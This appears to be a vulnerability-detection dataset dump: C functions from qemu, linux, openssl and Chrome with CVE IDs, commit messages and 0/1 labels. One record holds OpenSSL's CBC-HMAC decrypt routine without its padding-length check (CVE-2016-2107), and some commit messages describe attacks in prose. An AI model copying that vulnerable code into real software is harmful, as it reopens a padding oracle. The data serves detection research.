static void coroutine_fn v9fs_version(void *opaque) { ssize_t err; V9fsPDU *pdu = opaque; V9fsState *s = pdu->s; V9fsString version; size_t offset = 7; v9fs_string_init(&version); err = pdu_unmarshal(pdu, offset, "ds", &s->msize, &version); if (err < 0) { offset = err; goto out; } trace_v9fs_version(pdu->tag, pdu->id, s->msize, version.data); virtfs_reset(pdu); if (!strcmp(version.data, "9P2000.u")) { s->proto_version = V9FS_PROTO_2000U; } else if (!strcmp(version.data, "9P2000.L")) { s->proto_version = V9FS_PROTO_2000L; } else { v9fs_string_sprintf(&version, "unknown"); } err = pdu_marshal(pdu, offset, "ds", s->msize, &version); if (err < 0) { offset = err; goto out; } offset += err; trace_v9fs_version_return(pdu->tag, pdu->id, s->msize, version.data); out: pdu_complete(pdu, offset); v9fs_string_free(&version); }
static void coroutine_fn v9fs_version(void *opaque) { ssize_t err; V9fsPDU *pdu = opaque; V9fsState *s = pdu->s; V9fsString version; size_t offset = 7; v9fs_string_init(&version); err = pdu_unmarshal(pdu, offset, "ds", &s->msize, &version); if (err < 0) { offset = err; goto out; } trace_v9fs_version(pdu->tag, pdu->id, s->msize, version.data); virtfs_reset(pdu); if (!strcmp(version.data, "9P2000.u")) { s->proto_version = V9FS_PROTO_2000U; } else if (!strcmp(version.data, "9P2000.L")) { s->proto_version = V9FS_PROTO_2000L; } else { v9fs_string_sprintf(&version, "unknown"); } err = pdu_marshal(pdu, offset, "ds", s->msize, &version); if (err < 0) { offset = err; goto out; } offset += err; trace_v9fs_version_return(pdu->tag, pdu->id, s->msize, version.data); out: pdu_complete(pdu, offset); v9fs_string_free(&version); }
C
qemu
0
CVE-2014-3688
https://www.cvedetails.com/cve/CVE-2014-3688/
CWE-399
https://github.com/torvalds/linux/commit/26b87c7881006311828bb0ab271a551a62dcceb4
26b87c7881006311828bb0ab271a551a62dcceb4
net: sctp: fix remote memory pressure from excessive queueing This scenario is not limited to ASCONF, just taken as one example triggering the issue. When receiving ASCONF probes in the form of ... -------------- INIT[ASCONF; ASCONF_ACK] -------------> <----------- INIT-ACK[ASCONF; ASCONF_ACK] ------------ -------------------- COOKIE-ECHO --------------------> <-------------------- COOKIE-ACK --------------------- ---- ASCONF_a; [ASCONF_b; ...; ASCONF_n;] JUNK ------> [...] ---- ASCONF_m; [ASCONF_o; ...; ASCONF_z;] JUNK ------> ... where ASCONF_a, ASCONF_b, ..., ASCONF_z are well-formed ASCONFs and have increasing serial numbers, we process such ASCONF chunk(s) marked with !end_of_packet and !singleton, since we have not yet reached the SCTP packet end. SCTP only does verification on a chunk-by-chunk basis, as an SCTP packet is nothing more than just a container of a stream of chunks which it eats up one by one. We could run into the case that we receive a packet with a malformed tail, above marked as trailing JUNK. All previous chunks are well-formed here, so the stack will eat up all previous chunks up to this point. In case JUNK does not fit into a chunk header and there are no more other chunks in the input queue, or in case JUNK contains a garbage chunk header, but the encoded chunk length would exceed the skb tail, or we came here from an entirely different scenario and the chunk has pdiscard=1 mark (without having had a flush point), it will happen that we excessively queue up the association's output queue (a correct final chunk may then turn it into a response flood when flushing the queue ;)): I ran a simple script with incremental ASCONF serial numbers and could see the server side consuming an excessive amount of RAM [before/after: up to 2GB and more]. The issue at heart is that the chunk train basically ends with !end_of_packet and !singleton markers, and since commit 2e3216cd54b1 ("sctp: Follow security requirement of responding with 1 packet") this prevents an output queue flush point in sctp_do_sm() -> sctp_cmd_interpreter() on the input chunk (chunk = event_arg), even though local_cork is set, because its precedence has changed since then. In the normal case, the last chunk with end_of_packet=1 would trigger the queue flush to accommodate possible outgoing bundling. In the input queue, sctp_inq_pop() seems to do the right thing in terms of discarding invalid chunks. So, above JUNK will not enter the state machine and instead be released and exit the sctp_assoc_bh_rcv() chunk processing loop. It's simply the flush point being missing at loop exit. Adding a try-flush approach on the output queue might not work as the underlying infrastructure might be long gone at this point due to the side-effect interpreter run. One possibility, albeit a bit of a kludge, would be to defer invalid chunk freeing into the state machine in order to possibly trigger packet discards and thus indirectly a queue flush on error. It would surely be better to discard chunks as in the current, perhaps better controlled environment, but going back and forth, it's simply architecturally not possible. I tried various trailing JUNK attack cases and it seems to look good now. Joint work with Vlad Yasevich. Fixes: 2e3216cd54b1 ("sctp: Follow security requirement of responding with 1 packet") Signed-off-by: Daniel Borkmann <[email protected]> Signed-off-by: Vlad Yasevich <[email protected]> Signed-off-by: David S. Miller <[email protected]>
sctp_disposition_t sctp_sf_timer_ignore(struct net *net, const struct sctp_endpoint *ep, const struct sctp_association *asoc, const sctp_subtype_t type, void *arg, sctp_cmd_seq_t *commands) { pr_debug("%s: timer %d ignored\n", __func__, type.chunk); return SCTP_DISPOSITION_CONSUME; }
sctp_disposition_t sctp_sf_timer_ignore(struct net *net, const struct sctp_endpoint *ep, const struct sctp_association *asoc, const sctp_subtype_t type, void *arg, sctp_cmd_seq_t *commands) { pr_debug("%s: timer %d ignored\n", __func__, type.chunk); return SCTP_DISPOSITION_CONSUME; }
C
linux
0
CVE-2016-2107
https://www.cvedetails.com/cve/CVE-2016-2107/
CWE-310
https://git.openssl.org/?p=openssl.git;a=commit;h=68595c0c2886e7942a14f98c17a55a88afb6c292
68595c0c2886e7942a14f98c17a55a88afb6c292
null
static int aesni_cbc_hmac_sha256_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t len) { EVP_AES_HMAC_SHA256 *key = data(ctx); unsigned int l; size_t plen = key->payload_length, iv = 0, /* explicit IV in TLS 1.1 and * later */ sha_off = 0; # if defined(STITCHED_CALL) size_t aes_off = 0, blocks; sha_off = SHA256_CBLOCK - key->md.num; # endif key->payload_length = NO_PAYLOAD_LENGTH; if (len % AES_BLOCK_SIZE) return 0; if (ctx->encrypt) { if (plen == NO_PAYLOAD_LENGTH) plen = len; else if (len != ((plen + SHA256_DIGEST_LENGTH + AES_BLOCK_SIZE) & -AES_BLOCK_SIZE)) return 0; else if (key->aux.tls_ver >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; # if defined(STITCHED_CALL) /* * Assembly stitch handles AVX-capable processors, but its * performance is not optimal on AMD Jaguar, ~40% worse, for * unknown reasons. Incidentally processor in question supports * AVX, but not AMD-specific XOP extension, which can be used * to identify it and avoid stitch invocation. So that after we * establish that current CPU supports AVX, we even see if it's * either even XOP-capable Bulldozer-based or GenuineIntel one. */ if (OPENSSL_ia32cap_P[1] & (1 << (60 - 32)) && /* AVX? */ ((OPENSSL_ia32cap_P[1] & (1 << (43 - 32))) /* XOP? */ | (OPENSSL_ia32cap_P[0] & (1<<30))) && /* "Intel CPU"? */ plen > (sha_off + iv) && (blocks = (plen - (sha_off + iv)) / SHA256_CBLOCK)) { SHA256_Update(&key->md, in + iv, sha_off); (void)aesni_cbc_sha256_enc(in, out, blocks, &key->ks, ctx->iv, &key->md, in + iv + sha_off); blocks *= SHA256_CBLOCK; aes_off += blocks; sha_off += blocks; key->md.Nh += blocks >> 29; key->md.Nl += blocks <<= 3; if (key->md.Nl < (unsigned int)blocks) key->md.Nh++; } else { sha_off = 0; } # endif sha_off += iv; SHA256_Update(&key->md, in + sha_off, plen - sha_off); if (plen != len) { /* "TLS" mode of operation */ if (in != out) memcpy(out + aes_off, in + aes_off, plen - aes_off); /* calculate HMAC and append it to payload */ SHA256_Final(out + plen, &key->md); key->md = key->tail; SHA256_Update(&key->md, out + plen, SHA256_DIGEST_LENGTH); SHA256_Final(out + plen, &key->md); /* pad the payload|hmac */ plen += SHA256_DIGEST_LENGTH; for (l = len - plen - 1; plen < len; plen++) out[plen] = l; /* encrypt HMAC|padding at once */ aesni_cbc_encrypt(out + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } else { aesni_cbc_encrypt(in + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } } else { union { unsigned int u[SHA256_DIGEST_LENGTH / sizeof(unsigned int)]; unsigned char c[64 + SHA256_DIGEST_LENGTH]; } mac, *pmac; /* arrange cache line alignment */ pmac = (void *)(((size_t)mac.c + 63) & ((size_t)0 - 64)); /* decrypt HMAC|padding at once */ aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0); if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */ size_t inp_len, mask, j, i; unsigned int res, maxpad, pad, bitlen; int ret = 1; union { unsigned int u[SHA_LBLOCK]; unsigned char c[SHA256_CBLOCK]; } *data = (void *)key->md.data; if ((key->aux.tls_aad[plen - 4] << 8 | key->aux.tls_aad[plen - 3]) >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; if (len < (iv + SHA256_DIGEST_LENGTH + 1)) return 0; /* omit explicit iv */ out += iv; len -= iv; /* figure out payload length */ pad = out[len - 1]; maxpad = len - (SHA256_DIGEST_LENGTH + 1); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad &= 255; ret &= constant_time_ge(maxpad, pad); inp_len = len - (SHA256_DIGEST_LENGTH + pad + 1); mask = (0 - ((inp_len - len) >> 
(sizeof(inp_len) * 8 - 1))); inp_len &= mask; key->aux.tls_aad[plen - 1] = inp_len; /* calculate HMAC */ key->md = key->head; SHA256_Update(&key->md, key->aux.tls_aad, plen); # if 1 len -= SHA256_DIGEST_LENGTH; /* amend mac */ if (len >= (256 + SHA256_CBLOCK)) { j = (len - (256 + SHA256_CBLOCK)) & (0 - SHA256_CBLOCK); j += SHA256_CBLOCK - key->md.num; SHA256_Update(&key->md, out, j); out += j; len -= j; inp_len -= j; } /* but pretend as if we hashed padded payload */ bitlen = key->md.Nl + (inp_len << 3); /* at most 18 bits */ # ifdef BSWAP4 bitlen = BSWAP4(bitlen); # else mac.c[0] = 0; mac.c[1] = (unsigned char)(bitlen >> 16); mac.c[2] = (unsigned char)(bitlen >> 8); mac.c[3] = (unsigned char)bitlen; bitlen = mac.u[0]; # endif pmac->u[0] = 0; pmac->u[1] = 0; pmac->u[2] = 0; pmac->u[3] = 0; pmac->u[4] = 0; pmac->u[5] = 0; pmac->u[6] = 0; pmac->u[7] = 0; for (res = key->md.num, j = 0; j < len; j++) { size_t c = out[j]; mask = (j - inp_len) >> (sizeof(j) * 8 - 8); c &= mask; c |= 0x80 & ~mask & ~((inp_len - j) >> (sizeof(j) * 8 - 8)); data->c[res++] = (unsigned char)c; if (res != SHA256_CBLOCK) continue; /* j is not incremented yet */ mask = 0 - ((inp_len + 7 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 72) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; res = 0; } for (i = res; i < SHA256_CBLOCK; i++, j++) data->c[i] = 0; if (res > SHA256_CBLOCK - 8) { mask = 0 - ((inp_len + 8 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; memset(data, 0, SHA256_CBLOCK); j += 64; } data->u[SHA_LBLOCK - 1] = bitlen; sha256_block_data_order(&key->md, data, 1); mask = 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; # ifdef BSWAP4 pmac->u[0] = BSWAP4(pmac->u[0]); pmac->u[1] = BSWAP4(pmac->u[1]); pmac->u[2] = BSWAP4(pmac->u[2]); pmac->u[3] = BSWAP4(pmac->u[3]); pmac->u[4] = BSWAP4(pmac->u[4]); pmac->u[5] = BSWAP4(pmac->u[5]); pmac->u[6] = BSWAP4(pmac->u[6]); pmac->u[7] = BSWAP4(pmac->u[7]); # else for (i = 0; i < 8; i++) { res = pmac->u[i]; pmac->c[4 * i + 0] = (unsigned char)(res >> 24); pmac->c[4 * i + 1] = (unsigned char)(res >> 16); pmac->c[4 * i + 2] = (unsigned char)(res >> 8); pmac->c[4 * i + 3] = (unsigned char)res; } # endif len += SHA256_DIGEST_LENGTH; # else SHA256_Update(&key->md, out, inp_len); res = key->md.num; SHA256_Final(pmac->c, &key->md); { unsigned int inp_blocks, pad_blocks; /* but pretend as if we hashed padded payload */ inp_blocks = 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); res += (unsigned int)(len - inp_len); pad_blocks = res / SHA256_CBLOCK; res 
%= SHA256_CBLOCK; pad_blocks += 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); for (; inp_blocks < pad_blocks; inp_blocks++) sha1_block_data_order(&key->md, data, 1); } # endif key->md = key->tail; SHA256_Update(&key->md, pmac->c, SHA256_DIGEST_LENGTH); SHA256_Final(pmac->c, &key->md); /* verify HMAC */ out += inp_len; len -= inp_len; # if 1 { unsigned char *p = out + len - 1 - maxpad - SHA256_DIGEST_LENGTH; size_t off = out - p; unsigned int c, cmask; maxpad += SHA256_DIGEST_LENGTH; for (res = 0, i = 0, j = 0; j < maxpad; j++) { c = p[j]; cmask = ((int)(j - off - SHA256_DIGEST_LENGTH)) >> (sizeof(int) * 8 - 1); res |= (c ^ pad) & ~cmask; /* ... and padding */ cmask &= ((int)(off - 1 - j)) >> (sizeof(int) * 8 - 1); res |= (c ^ pmac->c[i]) & cmask; i += 1 & cmask; } maxpad -= SHA256_DIGEST_LENGTH; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; } # else for (res = 0, i = 0; i < SHA256_DIGEST_LENGTH; i++) res |= out[i] ^ pmac->c[i]; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; /* verify padding */ pad = (pad & ~res) | (maxpad & res); out = out + len - 1 - pad; for (res = 0, i = 0; i < pad; i++) res |= out[i] ^ pad; res = (0 - res) >> (sizeof(res) * 8 - 1); ret &= (int)~res; # endif return ret; } else { SHA256_Update(&key->md, out, len); } } return 1; }
static int aesni_cbc_hmac_sha256_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t len) { EVP_AES_HMAC_SHA256 *key = data(ctx); unsigned int l; size_t plen = key->payload_length, iv = 0, /* explicit IV in TLS 1.1 and * later */ sha_off = 0; # if defined(STITCHED_CALL) size_t aes_off = 0, blocks; sha_off = SHA256_CBLOCK - key->md.num; # endif key->payload_length = NO_PAYLOAD_LENGTH; if (len % AES_BLOCK_SIZE) return 0; if (ctx->encrypt) { if (plen == NO_PAYLOAD_LENGTH) plen = len; else if (len != ((plen + SHA256_DIGEST_LENGTH + AES_BLOCK_SIZE) & -AES_BLOCK_SIZE)) return 0; else if (key->aux.tls_ver >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; # if defined(STITCHED_CALL) /* * Assembly stitch handles AVX-capable processors, but its * performance is not optimal on AMD Jaguar, ~40% worse, for * unknown reasons. Incidentally processor in question supports * AVX, but not AMD-specific XOP extension, which can be used * to identify it and avoid stitch invocation. So that after we * establish that current CPU supports AVX, we even see if it's * either even XOP-capable Bulldozer-based or GenuineIntel one. */ if (OPENSSL_ia32cap_P[1] & (1 << (60 - 32)) && /* AVX? */ ((OPENSSL_ia32cap_P[1] & (1 << (43 - 32))) /* XOP? */ | (OPENSSL_ia32cap_P[0] & (1<<30))) && /* "Intel CPU"? */ plen > (sha_off + iv) && (blocks = (plen - (sha_off + iv)) / SHA256_CBLOCK)) { SHA256_Update(&key->md, in + iv, sha_off); (void)aesni_cbc_sha256_enc(in, out, blocks, &key->ks, ctx->iv, &key->md, in + iv + sha_off); blocks *= SHA256_CBLOCK; aes_off += blocks; sha_off += blocks; key->md.Nh += blocks >> 29; key->md.Nl += blocks <<= 3; if (key->md.Nl < (unsigned int)blocks) key->md.Nh++; } else { sha_off = 0; } # endif sha_off += iv; SHA256_Update(&key->md, in + sha_off, plen - sha_off); if (plen != len) { /* "TLS" mode of operation */ if (in != out) memcpy(out + aes_off, in + aes_off, plen - aes_off); /* calculate HMAC and append it to payload */ SHA256_Final(out + plen, &key->md); key->md = key->tail; SHA256_Update(&key->md, out + plen, SHA256_DIGEST_LENGTH); SHA256_Final(out + plen, &key->md); /* pad the payload|hmac */ plen += SHA256_DIGEST_LENGTH; for (l = len - plen - 1; plen < len; plen++) out[plen] = l; /* encrypt HMAC|padding at once */ aesni_cbc_encrypt(out + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } else { aesni_cbc_encrypt(in + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } } else { union { unsigned int u[SHA256_DIGEST_LENGTH / sizeof(unsigned int)]; unsigned char c[64 + SHA256_DIGEST_LENGTH]; } mac, *pmac; /* arrange cache line alignment */ pmac = (void *)(((size_t)mac.c + 63) & ((size_t)0 - 64)); /* decrypt HMAC|padding at once */ aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0); if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */ size_t inp_len, mask, j, i; unsigned int res, maxpad, pad, bitlen; int ret = 1; union { unsigned int u[SHA_LBLOCK]; unsigned char c[SHA256_CBLOCK]; } *data = (void *)key->md.data; if ((key->aux.tls_aad[plen - 4] << 8 | key->aux.tls_aad[plen - 3]) >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; if (len < (iv + SHA256_DIGEST_LENGTH + 1)) return 0; /* omit explicit iv */ out += iv; len -= iv; /* figure out payload length */ pad = out[len - 1]; maxpad = len - (SHA256_DIGEST_LENGTH + 1); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad &= 255; inp_len = len - (SHA256_DIGEST_LENGTH + pad + 1); mask = (0 - ((inp_len - len) >> (sizeof(inp_len) * 8 - 1))); inp_len &= mask; key->aux.tls_aad[plen - 1] = inp_len; /* calculate HMAC */ key->md = key->head; SHA256_Update(&key->md, key->aux.tls_aad, plen); # if 1 len -= SHA256_DIGEST_LENGTH; /* amend mac */ if (len >= (256 + SHA256_CBLOCK)) { j = (len - (256 + SHA256_CBLOCK)) & (0 - SHA256_CBLOCK); j += SHA256_CBLOCK - key->md.num; SHA256_Update(&key->md, out, j); out += j; len -= j; inp_len -= j; } /* but pretend as if we hashed padded payload */ bitlen = key->md.Nl + (inp_len << 3); /* at most 18 bits */ # ifdef BSWAP4 bitlen = BSWAP4(bitlen); # else mac.c[0] = 0; mac.c[1] = (unsigned char)(bitlen >> 16); mac.c[2] = (unsigned char)(bitlen >> 8); mac.c[3] = (unsigned char)bitlen; bitlen = mac.u[0]; # endif pmac->u[0] = 0; pmac->u[1] = 0; pmac->u[2] = 0; pmac->u[3] = 0; pmac->u[4] = 0; pmac->u[5] = 0; pmac->u[6] = 0; pmac->u[7] = 0; for (res = key->md.num, j = 0; j < len; j++) { size_t c = out[j]; mask = (j - inp_len) >> (sizeof(j) * 8 - 8); c &= mask; c |= 0x80 & ~mask & ~((inp_len - j) >> (sizeof(j) * 8 - 8)); data->c[res++] = (unsigned char)c; if (res != SHA256_CBLOCK) continue; /* j is not incremented yet */ mask = 0 - ((inp_len + 7 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 72) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; res = 0; } for (i = res; i < SHA256_CBLOCK; i++, j++) data->c[i] = 0; if (res > SHA256_CBLOCK - 8) { mask = 0 - ((inp_len + 8 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; memset(data, 0, SHA256_CBLOCK); j += 64; } data->u[SHA_LBLOCK - 1] = bitlen; sha256_block_data_order(&key->md, data, 1); mask = 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; # ifdef BSWAP4 pmac->u[0] = BSWAP4(pmac->u[0]); pmac->u[1] = BSWAP4(pmac->u[1]); pmac->u[2] = BSWAP4(pmac->u[2]); pmac->u[3] = BSWAP4(pmac->u[3]); pmac->u[4] = BSWAP4(pmac->u[4]); pmac->u[5] = BSWAP4(pmac->u[5]); pmac->u[6] = BSWAP4(pmac->u[6]); pmac->u[7] = BSWAP4(pmac->u[7]); # else for (i = 0; i < 8; i++) { res = pmac->u[i]; pmac->c[4 * i + 0] = (unsigned char)(res >> 24); pmac->c[4 * i + 1] = (unsigned char)(res >> 16); pmac->c[4 * i + 2] = (unsigned char)(res >> 8); pmac->c[4 * i + 3] = (unsigned char)res; } # endif len += SHA256_DIGEST_LENGTH; # else SHA256_Update(&key->md, out, inp_len); res = key->md.num; SHA256_Final(pmac->c, &key->md); { unsigned int inp_blocks, pad_blocks; /* but pretend as if we hashed padded payload */ inp_blocks = 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); res += (unsigned int)(len - inp_len); pad_blocks = res / SHA256_CBLOCK; res %= SHA256_CBLOCK; pad_blocks += 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); for (; inp_blocks < pad_blocks; inp_blocks++) sha1_block_data_order(&key->md, data, 1); } # endif key->md = key->tail; SHA256_Update(&key->md, pmac->c, SHA256_DIGEST_LENGTH); SHA256_Final(pmac->c, &key->md); /* verify HMAC */ out += inp_len; len -= inp_len; # if 1 { unsigned char *p = out + len - 1 - maxpad - SHA256_DIGEST_LENGTH; size_t off = out - p; unsigned int c, cmask; maxpad += SHA256_DIGEST_LENGTH; for (res = 0, i = 0, j = 0; j < maxpad; j++) { c = p[j]; cmask = ((int)(j - off - SHA256_DIGEST_LENGTH)) >> (sizeof(int) * 8 - 1); res |= (c ^ pad) & ~cmask; /* ... and padding */ cmask &= ((int)(off - 1 - j)) >> (sizeof(int) * 8 - 1); res |= (c ^ pmac->c[i]) & cmask; i += 1 & cmask; } maxpad -= SHA256_DIGEST_LENGTH; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; } # else for (res = 0, i = 0; i < SHA256_DIGEST_LENGTH; i++) res |= out[i] ^ pmac->c[i]; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; /* verify padding */ pad = (pad & ~res) | (maxpad & res); out = out + len - 1 - pad; for (res = 0, i = 0; i < pad; i++) res |= out[i] ^ pad; res = (0 - res) >> (sizeof(res) * 8 - 1); ret &= (int)~res; # endif return ret; } else { SHA256_Update(&key->md, out, len); } } return 1; }
C
openssl
1
CVE-2013-4588
https://www.cvedetails.com/cve/CVE-2013-4588/
CWE-119
https://github.com/torvalds/linux/commit/04bcef2a83f40c6db24222b27a52892cba39dffb
04bcef2a83f40c6db24222b27a52892cba39dffb
ipvs: Add boundary check on ioctl arguments The ipvs code has a nifty system for doing the size of ioctl command copies; it defines an array with values into which it indexes the cmd to find the right length. Unfortunately, the ipvs code forgot to check if the cmd was in the range that the array provides, allowing for an index outside of the array, which then gives a "garbage" result into the length, which then gets used for copying into a stack buffer. Fix this by adding sanity checks on these as well as the copy size. [ [email protected]: adjusted limit to IP_VS_SO_GET_MAX ] Signed-off-by: Arjan van de Ven <[email protected]> Acked-by: Julian Anastasov <[email protected]> Signed-off-by: Simon Horman <[email protected]> Signed-off-by: Patrick McHardy <[email protected]>
static int ip_vs_info_open(struct inode *inode, struct file *file) { return seq_open_private(file, &ip_vs_info_seq_ops, sizeof(struct ip_vs_iter)); }
static int ip_vs_info_open(struct inode *inode, struct file *file) { return seq_open_private(file, &ip_vs_info_seq_ops, sizeof(struct ip_vs_iter)); }
C
linux
0
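A minimal C sketch of the boundary check this commit message describes: validate the user-supplied command number before using it to index the per-command length table, so the copy size can never come from out-of-bounds memory. Names and sizes here are illustrative assumptions, not the exact ipvs code.

#include <errno.h>
#include <stddef.h>

/* per-command argument lengths, indexed by (cmd - base) */
static const unsigned int get_arglen[] = { 8, 16, 24, 32, 40, 48, 56 };
#define GET_CMD_BASE 64   /* hypothetical first command number */
#define GET_CMD_MAX  (GET_CMD_BASE + sizeof(get_arglen) / sizeof(get_arglen[0]) - 1)

static int get_copy_len(unsigned int cmd, size_t *lenp)
{
    if (cmd < GET_CMD_BASE || cmd > GET_CMD_MAX)
        return -EINVAL;                      /* the fix: reject out-of-range cmds */
    *lenp = get_arglen[cmd - GET_CMD_BASE];  /* index is now provably in bounds */
    return 0;
}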
CVE-2013-6626
https://www.cvedetails.com/cve/CVE-2013-6626/
null
https://github.com/chromium/chromium/commit/90fb08ed0146c9beacfd4dde98a20fc45419fff3
90fb08ed0146c9beacfd4dde98a20fc45419fff3
Cancel JavaScript dialogs when an interstitial appears. BUG=295695 TEST=See bug for repro steps. Review URL: https://chromiumcodereview.appspot.com/24360011 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@225026 0039d316-1c4b-4281-b951-d872f2087c98
gfx::NativeViewAccessible WebContentsImpl::GetParentNativeViewAccessible() { return accessible_parent_; }
gfx::NativeViewAccessible WebContentsImpl::GetParentNativeViewAccessible() { return accessible_parent_; }
C
Chrome
0
CVE-2017-8284
https://www.cvedetails.com/cve/CVE-2017-8284/
CWE-94
https://github.com/qemu/qemu/commit/30663fd26c0307e414622c7a8607fbc04f92ec14
30663fd26c0307e414622c7a8607fbc04f92ec14
tcg/i386: Check the size of instruction being translated This fixes the bug: 'user-to-root privesc inside VM via bad translation caching' reported by Jann Horn here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1122 Reviewed-by: Richard Henderson <[email protected]> CC: Peter Maydell <[email protected]> CC: Paolo Bonzini <[email protected]> Reported-by: Jann Horn <[email protected]> Signed-off-by: Pranith Kumar <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
static void gen_exts(TCGMemOp ot, TCGv reg) { gen_ext_tl(reg, reg, ot, true); }
static void gen_exts(TCGMemOp ot, TCGv reg) { gen_ext_tl(reg, reg, ot, true); }
C
qemu
0
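The guard this commit message describes can be sketched as follows: an x86 instruction is architecturally at most 15 bytes, so a translator that has consumed more than that from the guest stream is decoding garbage and must stop instead of caching a bogus translation. The helper below is a simplified illustration, not the actual QEMU translate.c code.

#include <stdint.h>

#define X86_MAX_INSN_LENGTH 15   /* architectural limit for one x86 insn */

/* returns 0 while the bytes consumed so far can still form one insn,
 * -1 when the caller should raise an illegal-opcode exception */
static int check_insn_length(const uint8_t *pc_start, const uint8_t *pc)
{
    if (pc - pc_start > X86_MAX_INSN_LENGTH)
        return -1;
    return 0;
}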
CVE-2018-20815
https://www.cvedetails.com/cve/CVE-2018-20815/
CWE-119
https://git.qemu.org/?p=qemu.git;a=commitdiff;h=da885fe1ee8b4589047484bd7fa05a4905b52b17
da885fe1ee8b4589047484bd7fa05a4905b52b17
null
static int findnode_nofail(void *fdt, const char *node_path) { int offset; offset = fdt_path_offset(fdt, node_path); if (offset < 0) { error_report("%s Couldn't find node %s: %s", __func__, node_path, fdt_strerror(offset)); exit(1); } return offset; }
static int findnode_nofail(void *fdt, const char *node_path) { int offset; offset = fdt_path_offset(fdt, node_path); if (offset < 0) { error_report("%s Couldn't find node %s: %s", __func__, node_path, fdt_strerror(offset)); exit(1); } return offset; }
C
qemu
0
CVE-2018-20182
https://www.cvedetails.com/cve/CVE-2018-20182/
CWE-119
https://github.com/rdesktop/rdesktop/commit/4dca546d04321a610c1835010b5dad85163b65e1
4dca546d04321a610c1835010b5dad85163b65e1
